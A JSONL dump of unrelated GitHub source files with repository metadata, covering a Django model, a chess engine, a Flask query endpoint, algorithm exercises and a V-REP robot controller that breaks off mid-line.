range(rep):\n print(name)","repo_name":"GeorgeWLF/it_school","sub_path":"S16/sys2.py","file_name":"sys2.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10652538006","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractUser\nfrom django.core.management.utils import get_random_secret_key\n\n\nclass User(AbstractUser):\n username = None\n email = models.EmailField(unique=True, db_index=True , primary_key=True)\n secret_key = models.CharField(max_length=255, default=get_random_secret_key)\n\n\n USERNAME_FIELD = 'email'\n REQUIRED_FIELDS = []\n\n class Meta:\n swappable = 'AUTH_USER_MODEL'\n\n @property\n def name(self):\n \n if not self.last_name:\n return self.first_name.capitalize()\n\n return f'{self.first_name.capitalize()} {self.last_name.capitalize()}'\n\nclass Profile(models.Model):\n status_choices = (\n ('S', 'Student'),\n ('P', 'Professor')\n )\n first_name = models.CharField(max_length=200, null=True, blank=True)\n last_name = models.CharField(max_length=200, null=True, blank=True)\n email = models.OneToOneField(User, unique=True,on_delete=models.CASCADE)\n # avatar = models.ImageField(upload_to='profile', blank = True) this\n avatar = models.CharField(max_length=200, null=True, blank=True)\n status = models.CharField(\n max_length=9, choices=status_choices) # Student / Professor\n faculty = models.CharField(max_length=200, blank=True, null=False)\n\n def __str__(self):\n return self.email.email\n\n\nclass Project(models.Model):\n name = models.CharField(max_length=200)\n owner = models.ManyToManyField(Profile, related_name='own')\n adviser = models.ManyToManyField(Profile, related_name='advice')\n status = models.BooleanField(default=True)\n\n def __str__(self):\n return self.name\n\n\nclass Todo(models.Model):\n title = models.CharField(max_length=120)\n description = models.TextField()\n completed = models.BooleanField(default=False)\n\n def _str_(self):\n return self.title","repo_name":"ittipat02/fixfixshit","sub_path":"server/users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12745011160","text":"class Piece:\n def __init__(self, game, data):\n self.game = game\n self.color = data['color']\n # self.start_coords = start_coords\n self._curr_coords = data['curr_coords']\n self.curr_coords_str = ','.join([str(num) for num in data['curr_coords']])\n self.times_moved = data['times_moved']\n self.valid_moves = data['valid_moves']\n self.id = data['id']\n\n base_val = 0\n\n @property\n def curr_coords(self):\n return self._curr_coords\n\n @curr_coords.setter\n def curr_coords(self, coords):\n self._curr_coords = coords\n self.curr_coords_str = ','.join([str(num) for num in coords])\n\n def get_value(self):\n return self.base_val\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'color': self.color,\n 'curr_coords': self.curr_coords,\n 'times_moved': self.times_moved,\n 'valid_moves': self.valid_moves\n }\n\n def move(self, new_coords, piece=None):\n [curr_row, curr_col] = self.curr_coords\n [new_row, new_col] = new_coords\n old_piece = self.game.board[new_row][new_col]\n\n if old_piece:\n del self.game.pieces[old_piece[:5]][old_piece]\n\n\n self.game.board[curr_row][curr_col] = None\n self.game.board[new_row][new_col] = self.id\n self.curr_coords = new_coords\n self.times_moved += 1\n return False\n\n\n def get_valid_moves(self):\n res = []\n visible_squares = self.get_line_of_sight()\n\n for square in visible_squares:\n [row, col] = square\n if self.game.board[row][col]:\n if self.game.board[row][col][:5] != self.color:\n res.append(square)\n else:\n res.append(square)\n\n if self.game.checks:\n if len(self.game.checks) > 1:\n res = []\n else:\n valid = self.game.checks[0]\n res = [square for square in res if square in valid]\n\n\n if self.game.pinned_pieces.get(self.curr_coords_str):\n res = [square for square in res if square in self.game.pinned_pieces[self.curr_coords_str]]\n\n self.valid_moves = res\n if res:\n self.game.valid_moves[self.curr_coords_str] = res\n return res\n\n\n\nclass LongRangePiece(Piece):\n def __init__(self, game, data):\n super().__init__(game, data)\n\n\n def get_line_of_sight(self):\n res = []\n\n for direction in self.directions:\n [rowDir, colDir] = direction\n [row, col] = self.curr_coords\n checkArr = [[row, col]]\n currEl = None\n\n while row+rowDir in range(8) and col+colDir in range(8) and (currEl is None):\n row += rowDir\n col += colDir\n\n currEl = self.game.board[row][col]\n res.append([row, col])\n if self.game.turn[1] == self.color:\n if self.color == 'white':\n enemy_king = self.game.kings['black']\n else:\n enemy_king = self.game.kings['white']\n\n if [row, col] == enemy_king.curr_coords:\n self.game.checks.append([*checkArr])\n else:\n checkArr.append([row,col])\n\n return res\n\n\n\nclass ShortRangePiece(Piece):\n def __init__(self, game, data):\n super().__init__(game, data)\n\n\n def get_line_of_sight(self):\n res = []\n [curr_row, curr_col] = self.curr_coords\n if self.color == 'white':\n enemy_king = self.game.kings['black']\n else:\n enemy_king = self.game.kings['white']\n for pair in self.pairs:\n [row, col] = pair\n row+=curr_row\n col+=curr_col\n\n if((row <= 7 and row >= 0) and (col <= 7 and col >= 0)):\n if ((self.game.turn[1] == self.color) and ([row, col] == enemy_king.curr_coords)):\n self.game.checks.append([[curr_row,curr_col]])\n\n res.append([row, col])\n\n return res\n\n\n\n\n\n\n\nclass Pawn(ShortRangePiece):\n def __init__(self, game, data):\n super().__init__(game, data)\n\n self.en_passantable = data['en_passantable']\n self.double_move = data['double_move']\n self.en_passant_move = data['en_passant_move']\n if self.color == 'black':\n self.pairs = [[1, -1], [1, 1]]\n elif self.color == 'white':\n self.pairs = [[-1, -1], [-1, 1]]\n\n base_val = 10\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'color': self.color,\n 'curr_coords': self.curr_coords,\n 'times_moved': self.times_moved,\n 'valid_moves': self.valid_moves,\n 'en_passantable': self.en_passantable,\n 'double_move': self.double_move,\n 'en_passant_move': self.en_passant_move\n }\n\n\n def move(self, new_coordinates, piece=None):\n upgrade_bool = False\n [curr_row, curr_col] = self.curr_coords\n [new_row, new_col] = new_coordinates\n old_piece = None\n old_piece_key = None\n if new_coordinates == self.double_move:\n self.en_passantable = True\n elif self.en_passant_move.get(','.join([str(num) for num in new_coordinates ])):\n old_piece_key = self.en_passant_move[','.join([str(num) for num in new_coordinates ])]\n old_piece = self.game.pieces[old_piece_key[:5]][old_piece_key]\n [oldRow, oldCol] = old_piece.curr_coords\n self.game.board[oldRow][oldCol] = None\n else:\n old_piece_key = self.game.board[new_row][new_col]\n if old_piece_key:\n old_piece = self.game.pieces[old_piece_key[:5]][old_piece_key]\n\n\n if (old_piece):\n del self.game.pieces[old_piece_key[:5]][old_piece_key]\n\n\n self.game.board[curr_row][curr_col] = None\n self.game.board[new_row][new_col] = self.id\n self.curr_coords = new_coordinates\n self.times_moved += 1\n\n if self.color == 'white' and self.curr_coords[0] == 0:\n upgrade_bool = True\n elif self.color == 'black' and self.curr_coords[0] == 7:\n upgrade_bool = True\n\n return upgrade_bool\n\n\n def get_valid_moves(self):\n self.double_move = None\n self.en_passant_move = {}\n if self.color == self.game.turn[0]:\n self.en_passantable = False\n\n\n res = []\n visible_squares = self.get_line_of_sight()\n [curr_row, curr_col] = self.curr_coords\n first_square = None\n second_square = None\n if self.color == 'black':\n first_square = 1\n second_square = 2\n elif self.color == 'white':\n first_square = -1\n second_square = -2\n\n\n if self.game.board[curr_row+first_square][curr_col] == None:\n res.append([curr_row+first_square, curr_col])\n if self.times_moved == 0 and self.game.board[curr_row+second_square][curr_col] == None:\n res.append([curr_row+second_square, curr_col])\n self.double_move = [curr_row+second_square,curr_col]\n\n for square in visible_squares:\n [row, col] = square\n piece1 = self.game.board[row][col]\n piece2 = self.game.board[curr_row][col]\n if piece1 and piece1[:5] != self.color:\n res.append(square)\n\n elif piece2 and piece2[6:10] == 'pawn' and piece2[:5] != self.color and self.game.pieces[piece2[:5]][piece2].__getattribute__('en_passantable'):\n res.append(square)\n self.en_passant_move[','.join([str(num) for num in square])] = self.game.board[curr_row][col]\n\n\n if self.game.checks:\n if len(self.game.checks) > 1:\n res = []\n else:\n valid = self.game.checks[0]\n res = [square for square in res if square in valid]\n\n\n if self.game.pinned_pieces.get(self.curr_coords_str):\n res = [square for square in res if square in self.game.pinned_pieces[self.curr_coords_str]]\n\n\n self.valid_moves = res\n if res:\n self.game.valid_moves[self.curr_coords_str] = res\n return res\n\nclass Rook(LongRangePiece):\n def __init__(self, game, data):\n super().__init__(game, data)\n\n directions = [[-1, 0], [1, 0], [0, -1], [0, 1]]\n base_val = 50\n\n\nclass Knight(ShortRangePiece):\n def __init__(self, game, data):\n super().__init__(game, data)\n\n pairs = [[-2, -1], [-2, 1], [-1, -2], [1, -2], [-1, 2], [1, 2], [2, -1], [2, 1]]\n base_val = 30\n\n\nclass Bishop(LongRangePiece):\n def __init__(self, game, data):\n super().__init__(game, data)\n\n directions = [[1,-1], [1, 1], [-1, -1], [-1, 1]]\n base_val = 30\n\n\nclass Queen(LongRangePiece):\n def __init__(self, game, data):\n super().__init__(game, data)\n\n directions = [[-1, 0], [1, 0], [0, -1], [0, 1], [1,-1], [1, 1], [-1, -1], [-1, 1]]\n base_val = 90\n\n\nclass King(ShortRangePiece):\n def __init__(self, game, data):\n super().__init__(game, data)\n\n self.castle_move = data['castle_move']\n # if self.color == 'white':\n # self.game.white_king = self\n # else:\n # self.game.black_king = self\n pairs = [[1,-1], [1, 1], [-1, -1], [-1, 1], [-1, 0], [1, 0], [0, -1], [0, 1]]\n base_val = 900\n\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'color': self.color,\n 'curr_coords': self.curr_coords,\n 'times_moved': self.times_moved,\n 'valid_moves': self.valid_moves,\n 'castle_move': self.castle_move\n }\n\n def move(self, new_coordinates, piece=None):\n [curr_row, curr_col] = self.curr_coords\n [new_row, new_col] = new_coordinates\n old_piece = self.game.board[new_row][new_col]\n coords_str = ','.join([str(num) for num in new_coordinates])\n if self.castle_move.get(coords_str):\n rookStr = self.castle_move[coords_str]['piece']\n rook = self.game.pieces[rookStr[:5]][rookStr]\n [rook_row, rook_col] = self.castle_move[coords_str]['spot']\n [old_rook_row, old_rook_col] = rook.curr_coords\n\n self.game.board[old_rook_row][old_rook_col] = None\n self.game.board[rook_row][rook_col] = rookStr\n rook.curr_coords = [rook_row, rook_col]\n rook.times_moved += 1\n\n\n if old_piece:\n del self.game.pieces[old_piece[:5]][old_piece]\n\n\n\n self.game.board[curr_row][curr_col] = None\n self.game.board[new_row][new_col] = self.id\n self.curr_coords = new_coordinates\n self.times_moved += 1\n\n return False\n\n\n def get_valid_moves(self):\n self.castle_move = {}\n res = []\n visible_squares = self.get_line_of_sight()\n\n friendly_pieces = self.game.pieces[self.color]\n\n for square in visible_squares:\n [row, col] = square\n if not (self.game.board[row][col]) or (self.game.board[row][col][:5] != self.color):\n res.append(square)\n\n res = [square for square in res if not (square in self.game.opponent_line_of_sight)]\n\n if self.times_moved == 0 and not self.game.checks:\n leftRight = [-1, 1]\n\n for direction in leftRight:\n [row, col] = self.curr_coords\n castle_move = [row, (direction * 2) + col]\n castle_move_str = f'{row},{(direction * 2) + col}'\n dependantMove = [row,direction + col]\n foundPiece = None\n\n while col+direction in range(8) and not foundPiece:\n col += direction\n\n if self.game.board[row][col]:\n pieceStr = self.game.board[row][col]\n foundPiece = friendly_pieces.get(pieceStr)\n\n\n if foundPiece and foundPiece.id[6:10] == 'rook' and foundPiece.times_moved == 0:\n if dependantMove in res and not (castle_move in self.game.opponent_line_of_sight):\n self.castle_move[castle_move_str] = {'piece': pieceStr, 'spot': dependantMove}\n res.append(castle_move)\n\n\n self.valid_moves = res\n if res:\n self.game.valid_moves[self.curr_coords_str] = res\n return res\n\n\n def check_for_pins(self):\n pairs = [[['bish', 'quee'], [[1,-1], [1, 1], [-1, -1], [-1, 1]]], [['rook', 'quee'], [[-1, 0], [1, 0], [0, -1], [0, 1]]]]\n res = {}\n\n for pair in pairs:\n [threats, directions] = pair\n for direction in directions:\n [rowDir, colDir] = direction\n [row, col] = self.curr_coords\n pinnedMoves = []\n pieces = []\n\n\n while row+rowDir in range(8) and col+colDir in range(8) and len(pieces) < 2:\n row += rowDir\n col += colDir\n\n pinnedMoves.append([row, col])\n\n if self.game.board[row][col]:\n pieces.append(self.game.board[row][col])\n\n\n if (len(pieces) == 2) and (pieces[0][:5] == self.color) and (pieces[1][:5] != self.color) and (pieces[1][6:10] in threats):\n res[self.game.pieces[self.color][pieces[0]].curr_coords_str] = pinnedMoves\n\n return res\n\npieces_obj = {\n 'pawn': Pawn,\n 'rook': Rook,\n 'knig': Knight,\n 'bish': Bishop,\n 'quee': Queen,\n 'king': King\n}\n","repo_name":"peter-monahan/Just-Chess","sub_path":"app/py_chess/Pieces.py","file_name":"Pieces.py","file_ext":"py","file_size_in_byte":12056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22521385598","text":"\"\"\"Airbnb System Design.\"\"\"\nimport sys\nfrom hornet.digraph import Digraph, SubGraph, Cluster\nfrom systems.nodes import (\n Kafka,\n Elasticsearch,\n Cassandra,\n Internet,\n NextJs,\n Redis,\n HAProxy,\n Spring,\n Python,\n PostgreSQL,\n)\n\n\nif __name__ == \"__main__\":\n \"\"\"Draw an Airbnb system architecture.\"\"\"\n with Digraph(\n sys.argv[1],\n {\n \"dpi\": \"350\",\n \"splines\": \"true\",\n \"newrank\": \"true\",\n \"fontname\": \"Times New Roman\",\n },\n cleanup=False,\n ):\n internet = Internet(\"Internet\")\n with Cluster():\n with SubGraph({\"rank\": \"same\"}):\n frontend = NextJs(\"Frontend\")\n api_gateway = Spring(\"API Gateway\")\n frontend >> api_gateway\n\n load_balancer = HAProxy(\"Load Balancer\")\n load_balancer >> frontend\n api_gateway >> Spring(\"User\") >> PostgreSQL(\"DB\")\n internet >> [load_balancer, api_gateway]\n hotel = Spring(\"Hotel\")\n api_gateway >> hotel >> PostgreSQL(\"DB\")\n booking = Spring(\"Booking\")\n api_gateway >> booking\n (\n api_gateway\n >> Spring(\"Hotel\")\n >> [\n PostgreSQL(\"DB\"),\n Redis(\"Cache\"),\n Elasticsearch(\"Search\"),\n ]\n )\n\n booking >> [PostgreSQL(\"DB\")]\n\n messages = Kafka(\"User activities\")\n analysis = Python(\"Analysis\")\n\n (\n [hotel, booking]\n >> messages\n << analysis\n >> Cassandra(\"User activities\")\n )\n","repo_name":"nryotaro/sd","sub_path":"systems/systems/airbnb/leetcode.py","file_name":"leetcode.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22526232977","text":"'''\nMin Rewards\n\nGiven list of unique scores, give list of reward points according to two rules:\n1. all students must receive at least one reward\n2. any given student must receive more rewards than an adjacent student \nwith a lower score and must receive strictly fewer rewards than an adjacent \nstudent with a higher score. \n\nSample input: [8, 4, 2, 1, 3, 6, 7, 9, 5]\nSample output: 25 ([4, 3, 2, 1, 2, 3, 4, 5, 1])\n'''\nimport time\n\nclass Prob:\n @staticmethod\n def minRewards(scores):\n rewards = [1] * len(scores)\n \n i = 1\n decn = 0\n while i < len(scores):\n print(\"i===\", i)\n \n if scores [i-1] < scores[i]:\n # for increase\n if decn > 0:\n print(\" decn is currently: \", decn)\n for j in range(i-2, i-decn-2, -1):\n if rewards[j] < rewards[j+1]+1:\n rewards[j] = rewards[j+1]+1\n \n print(\" rewards[j={}]= {}\".format(j,rewards[j]))\n decn = 0\n \n rewards[i] += rewards[i-1]\n \n else:\n # for decrease\n # count number of decreasing values\n decn += 1\n print(\"decn: \", decn)\n \n i+=1\n \n if decn > 0 and rewards[-1]==1 and rewards[-2]==1:\n print(\"B i=\", i)\n for j in range(i-2, i-decn-2, -1):\n print(\"B j=\", j)\n rewards[j] = rewards[j+1] + 1\n print(\"final rewards:\", rewards) \n return sum(rewards)\n \n @staticmethod\n def test1():\n #scores = [8, 4, 2, 1, 3, 6, 7, 9, 5] #25\n #scores = [8, 4, 2, 1, 3, 6, 7, 9, 10] #30\n #scores = [1]\n #scores = [5,10]\n #scores = [10,5]\n #scores = [10,9,8,7]\n #scores = [5,10,11]\n #scores = [5,10,9]\n #scores = [5,10,15,20,17,18,19]\n #scores = [0, 4, 2, 1, 3] # 9\n scores = [800, 400, 20, 10, 30, 61, 70, 90, 17, 21]\n #scores = [800, 400, 20, 10, 30, 61, 70, 90, 17, 21, 22, 13, 12, 11, 8, 4, 2, 1, 3, 6, 7, 9, 0, 68, 55, 67, 57, 60, 51, 661, 50, 65, 53] #93\n #scores = [i for i in range(10,-1,-1)]\n rewardSum = Prob.minRewards(scores)\n print(\"test1: rewardSum: \", rewardSum)\n \n @staticmethod\n def minRewards2(scores):\n rewards = [1] * len(scores)\n for i in range(1, len(scores)):\n if scores[i-1] < scores[i]:\n rewards[i] += rewards[i-1]\n print(\"rewards A: \", rewards)\n for i in range(len(scores)-2, -1, -1):\n if scores[i] > scores[i+1] and rewards[i+1]+1 > rewards[i]:\n rewards[i] = rewards[i+1]+1\n print(\"rewards B: \", rewards)\n rewardSum = sum(rewards)\n print(\"rewardSum: \", rewardSum)\n return rewardSum\n \n @staticmethod\n def test2():\n scores = [8, 4, 2, 1, 3, 6, 7, 9, 5] #25\n #scores = [8, 4, 2, 1, 3, 6, 7, 9, 10] #30\n #scores = [1]\n #scores = [5,10]\n #scores = [10,5]\n #scores = [10,9,8,7]\n #scores = [5,10,11]\n #scores = [5,10,9]\n #scores = [5,10,15,20,17,18,19]\n #scores = [0, 4, 2, 1, 3] # 9\n #scores = [800, 400, 20, 10, 30, 61, 70, 90, 17, 21]\n #scores = [800, 400, 20, 10, 30, 61, 70, 90, 17, 21, 22, 13, 12, 11, 8, 4, 2, 1, 3, 6, 7, 9, 0, 68, 55, 67, 57, 60, 51, 661, 50, 65, 53] #93\n #scores = [i for i in range(10,-1,-1)]\n Prob.minRewards2(scores)\n \n#Prob.test1()\nProb.test2()\n","repo_name":"mcxu/code-sandbox","sub_path":"PythonSandbox/src/misc/min_rewards.py","file_name":"min_rewards.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"74182409386","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport webapp2\n\nimport os\nfrom google.appengine.ext.webapp import template\n\nfrom google.appengine.ext.webapp.util import login_required\nfrom google.appengine.api import users\n\nimport common\n\nimport datetime # 日付モジュール\n\nfrom MstUser import * # 使用者マスタ\nfrom DatSoudan import * # 相談記録\n\nclass MainHandler(webapp2.RequestHandler):\n\n @login_required\n\n def get(self):\n\n user = users.get_current_user() # ログオン確認\n if MstUser().ChkUser(user.email()) == False:\n self.redirect(users.create_logout_url(self.request.uri))\n return\n if self.request.get('Hizuke') == \"\": # パラメタ無し?\n Hizuke = self.request.cookies.get('Hizuke', '') # Cookieより\n else:\n Hizuke = self.request.get('Hizuke') # パラメタ取得\n cookieStr = 'Hizuke=' + self.request.get('Hizuke') + ';' # Cookie保存\n self.response.headers.add_header('Set-Cookie', cookieStr.encode('shift-jis'))\n\n LblMsg = \"記録を選択するか、新規作成を押してください\"\n\n template_values = {\n 'Hizuke':Hizuke,\n 'Recs' :DatSoudan().GetAll(),\n 'LblMsg': LblMsg\n }\n path = os.path.join(os.path.dirname(__file__), 'Ninchi010.html')\n self.response.out.write(template.render(path, template_values))\n\n def post(self):\n\n LblMsg = \" \"\n\n for param in self.request.arguments(): \n if \"BtnSelect\" in param: # 更新ボタン?\n Parm = \"?Key=\" + param.replace(\"BtnSelect\",\"\") # Cookieより\n self.redirect(\"/Ninchi020/\" + Parm) #\n if \"BtnDel\" in param: # 削除ボタン?\n DatSoudan().DelRec(param.replace(\"BtnDel\",\"\"))\n\n if self.request.get('BtnAdd') != '':\n Parm = \"?Hizuke=\" + self.request.cookies.get('Hizuke', '') # Cookieより\n self.redirect(\"/Ninchi020/\" + Parm) # \n return\n\n Hizuke = self.request.cookies.get('Hizuke', '') # Cookieより\n\n template_values = {\n 'Hizuke':Hizuke,\n 'Recs' :DatSoudan().GetAll(),\n 'LblMsg': LblMsg\n }\n path = os.path.join(os.path.dirname(__file__), 'Ninchi010.html')\n self.response.out.write(template.render(path, template_values))\n\n####################################################################################################\n\n\napp = webapp2.WSGIApplication([\n ('/Ninchi010/', MainHandler)\n], debug=True)\n","repo_name":"YuziSumoto/Ninchi","sub_path":"Ninchi010.py","file_name":"Ninchi010.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34356535623","text":"'''\r\nCreated on 06/03/2012\r\n\r\n@author: Evandro\r\n'''\r\n\r\nclass Poker(object):\r\n '''\r\n classdocs\r\n '''\r\n\r\n\r\n def __init__(self):\r\n '''\r\n Constructor\r\n '''\r\n def _converte_para_numero(self, carta):\r\n if carta == 'J':\r\n return 11\r\n elif carta == 'Q':\r\n return 12\r\n elif carta == 'K':\r\n return 13\r\n elif carta == 'A':\r\n return 14\r\n else:\r\n return carta\r\n \r\n \r\n \r\n def ValidaJogada(self, jogador_1_numero, jogador_2_numero):\r\n \r\n for valor in ['14', '13', '12', '11', '10', '9', '8', '7', '6', '5', '4', '3', '2']:\r\n count_jogador_1 = jogador_1_numero.count(str(valor))\r\n count_jogador_2 = jogador_2_numero.count(str(valor))\r\n if count_jogador_1 > count_jogador_2 and count_jogador_1 > 1:\r\n return 1\r\n elif count_jogador_2 > count_jogador_1 and count_jogador_2 > 1:\r\n return 2\r\n\r\n \r\n ultimaCartaJogador1 = self._converte_para_numero(jogador_1_numero[4])\r\n ultimaCartaJogador2 = self._converte_para_numero(jogador_2_numero[4])\r\n \r\n if (int(ultimaCartaJogador1) > int(ultimaCartaJogador2)):\r\n return 1\r\n elif (int(ultimaCartaJogador2) > int(ultimaCartaJogador1)):\r\n return 2\r\n else:\r\n return 0 \r\n \r\n","repo_name":"evandroamparo/dojo-tecsystem","sub_path":"poker/src/main/Poker.py","file_name":"Poker.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2754800391","text":"from flask import Blueprint, request\nfrom ..DBConnect import setup, insert, select, delete\n\nbp = Blueprint('main', __name__, url_prefix='/')\n\n# http://localhost:5000/\n@bp.route('/')\ndef query():\n setup()\n\n if request.method == 'GET':\n type = request.args.get('queryType')\n tableName = request.args.get('tableName')\n datas = 'null'\n\n if type == 'insert':\n datas = request.args.get('datas')\n insert(tableName=tableName, datas=datas)\n elif type == 'select':\n params = request.args.get('params')\n data = request.args.get('data')\n datas = select(tableName=tableName, params=params, data=data)\n\n if len(datas) == 0:\n return [{'what': f'{tableName} is null'}]\n\n return datas\n elif type == 'delete':\n data = request.args.get('data')\n delete(tableName=tableName, data=data)\n\n return [{'what': f'execute insert or delete'}]\n","repo_name":"BosungJu/py_kiosk_server","sub_path":"kioskServer/views/main_views.py","file_name":"main_views.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71079214508","text":"from tornado.queues import Queue\nfrom tornado import gen\nfrom tornado.ioloop import IOLoop\nfrom preview.previewer import Previewer\n\n\nclass PreviewConsumer:\n id = 0\n\n def __init__(self, queue):\n PreviewConsumer.id += 1\n self.id = PreviewConsumer.id\n self.queue = queue\n\n @gen.coroutine\n def process(self):\n while True:\n task = yield self.queue.get()\n image, imageId, bucket, logger = task\n previewer = Previewer(image, imageId, bucket, logger)\n try:\n yield previewer.makeThumbnails()\n except Exception:\n try:\n logger.exception()\n except Exception:\n logger.error(\"failed logged exception\")\n finally:\n self.queue.task_done()\n\n\n\nclass BaseQueue:\n def __init__(self, consumerCls, countConsumer):\n self.queue = Queue()\n self.consumers = []\n self.start = False\n self.countConsumer = countConsumer\n self.consumerCls = consumerCls\n\n @gen.coroutine\n def putTask(self, task):\n\n if not self.start:\n for i in range(self.countConsumer):\n consumer = self.consumerCls(self.queue)\n self.consumers.append(consumer)\n IOLoop.current().spawn_callback(consumer.process)\n self.start = True\n\n yield self.queue.put(task)\n\n\nTHUMBNAIL_QUEUE = BaseQueue(PreviewConsumer, 5)","repo_name":"qonteo/luna","sub_path":"luna_v.3.3.3/luna-image-store/luna_image_store/preview/preview_queue.py","file_name":"preview_queue.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12753274749","text":"__author__ = 'HaoBin'\n\nfrom Week5.Q6 import *\n\ndef Hirschberg(p, q, p1, p2, q1, q2):\n print(\">>>\",p[p1:p2],p1,p2)\n print(\">>>\",q[q1:q2],q1,q2)\n z = \"\"\n w = \"\"\n if p2 <= p1:\n # BASE CASE: P empty\n for i in range(q1, q2):\n z += \"-\"\n w += q[i]\n print(\"c1\",z,w)\n\n elif q2 <= q1:\n # BASE CASE: Q empty\n for i in range(p1, p2):\n z += p[i]\n w += \"-\"\n print(\"c2\",z,w)\n\n elif p2 - 1 == p1 or q2-1 == q1:\n # BASE CASE: LEN(P)=1 and LEN(Q)>=1\n z,w = NeedlemanWunsch(p[p1:p2],q[q1:q2])\n print(\"c3\",z,w)\n\n\n else:\n print(\"l1\")\n mid = (p1 + p2) // 2\n fwd = DPA(p1, mid, q1, q2, p, q)\n rev = DPA(p2, mid, q1, q2, p, q)\n\n s2mid = q1\n best = len(p) + len(q)\n for i in range(1,q2 - q1):\n sum = fwd[i] + rev[i]\n if sum <= best:\n best = sum\n s2mid = i\n print(\"r1\")\n z1, w1 = Hirschberg(p, q, p1, mid, q1, s2mid)\n print(\"r2\")\n z2, w2 = Hirschberg(p, q, mid, p2, s2mid, q2)\n z = z + z1 + z2\n w = w + w1 + w2\n print(\"x\",z,w)\n return z, w\n\n\ndef DPA(p1, p2, q1, q2, p, q):\n m = [[None for i in range(len(q) + 1)] for j in range(2)]\n flag = False\n # print(p1,p2)\n if p2 < p1:\n q = q[::-1]\n p = p[::-1]\n p1, p2 = 0, p1 - p2\n flag = True\n c = p1 % 2\n m[c][q1] = 0\n for j in range(q1 + 1, q2 + 1):\n m[c][j] = m[c][j - 1] + 1\n for i in range(p1 + 1, p2 + 1):\n m[i % 2][q1] = m[(i - 1) % 2][q1] + 1\n for j in range(q1 + 1, q2 + 1):\n diag = m[(i - 1) % 2][j - 1]\n if p[i - 1] != q[j - 1]:\n diag += 2\n m[i % 2][j] = min(diag, m[(i - 1) % 2][j] + 1, m[i % 2][j - 1] + 1)\n #print(\">\",m)\n if flag is True:\n return m[(p2 - p1) % 2][q2 + 1:q1:-1][::-1]\n else:\n return m[(p2 - p1) % 2][q1 + 1:q2 + 1]\n","repo_name":"hbinl/hbinl-scripts","sub_path":"Python/P5 - Sorting and Edit Distance/Hirschberg-Old.py","file_name":"Hirschberg-Old.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3564549413","text":"from startup import *\nfrom robot_controle import *\nfrom driving_calc import *\nfrom slam import Slam\nimport numpy as np\nimport sys\nfrom matplotlib import pyplot as plt\n\nclass Robot:\n\tdef __init__(self):\n\t\t#robot parameters\n\t\tself.omtrek_wiel = 0.08 * np.pi\n\t\tself.afstand_wielen = 0.26\n\t\tself.correctiefactor = 0.95\n\t\tself.scan_hoek = 365/4/60\n\t\tself.Robot_parts = ['linkermotor','rechtermotor','Laser_Sensor','Laser_Sensor0','Laser_Sensor1','Laser_Sensor2','Lidar_Motor','Dummy']\n\t\tself.motors = ['linkermotor','rechtermotor']\n\t\tself.sensors = ['Laser_Sensor','Laser_Sensor0','Laser_Sensor1','Laser_Sensor2']\n\t\tself.rejection_distance = 0.2\n\t\t\n\t\t#initialize slam\n\t\tself.ObjSlam = Slam()\n\t\t\n\t\t#startup parameters\n\t\tself.modus = 0 \t#0 is ronde scannen\n\t\t\t\t\t\t#1 is stukje rijden\n\t\tself.ticks = 0\n\t\tself.locatie = [0,0,0]\n\t\tself.distance = {'Laser_Sensor':[],'Laser_Sensor0':[],'Laser_Sensor1':[],'Laser_Sensor2':[]}\n\t\tself.map_landmark = []\n\t\tself.geschiedenis_locatie_x = []\n\t\tself.geschiedenis_locatie_y = []\n\t\tself.slam_position = [0,0,0]\n\t\tself.real_position = [0,0]\n\t\t\n\t\tself.clientID = make_connection()\n\t\tself.handle = get_handle(self.clientID,self.Robot_parts)\n\t\tself.old_motor_position = position_motor(self.handle,self.motors,self.clientID)\n\t\tvrep.simxSynchronousTrigger(self.clientID)\n\t\tplt.ion()\n\t\tplt.show()\n\n\tdef pos_calculate(self):\n\t\tself.motor_position = position_motor(self.handle,self.motors,self.clientID)\n\t\tself.locatie,self.old_motor_position=drive_calc(self.motor_position,self.old_motor_position,self.motors,self.omtrek_wiel,self.afstand_wielen,self.locatie,self.correctiefactor)\n\t\tself.geschiedenis_locatie_x.append(self.locatie[0])\n\t\tself.geschiedenis_locatie_y.append(self.locatie[1])\n\t\t\n\t\t#echte positie ophalen uit vrep, eerst rotatie dan positie\n\t\torrientatie = get_orrientation(self.handle,self.clientID,'Dummy')\n\t\tself.real_position = get_position(self.handle,self.clientID,'Dummy')\n\t\t\n\t\t\n\tdef drive(self):\n\t\tself.driving(3,6)\n\t\tself.ticks += 1\n\t\tself.pos_calculate()\n\t\tObjRobot.plotting()\n\t\tif self.ticks > 20:\n\t\t\tself.modus = 0\n\t\t\tself.ticks = 1\n\t\t\n\tdef driving(self,left_motor,right_motor):\n\t\tmove_motor(self.handle,'linkermotor',left_motor,self.clientID)\n\t\tmove_motor(self.handle,'rechtermotor',right_motor,self.clientID)\n\t\n\tdef scanning(self):\n\t\tself.driving(0,0)\n\t\tlidar_positie = position_lidar_motor(self.handle,'Lidar_Motor',self.clientID)\n\t\tlidar_positie += 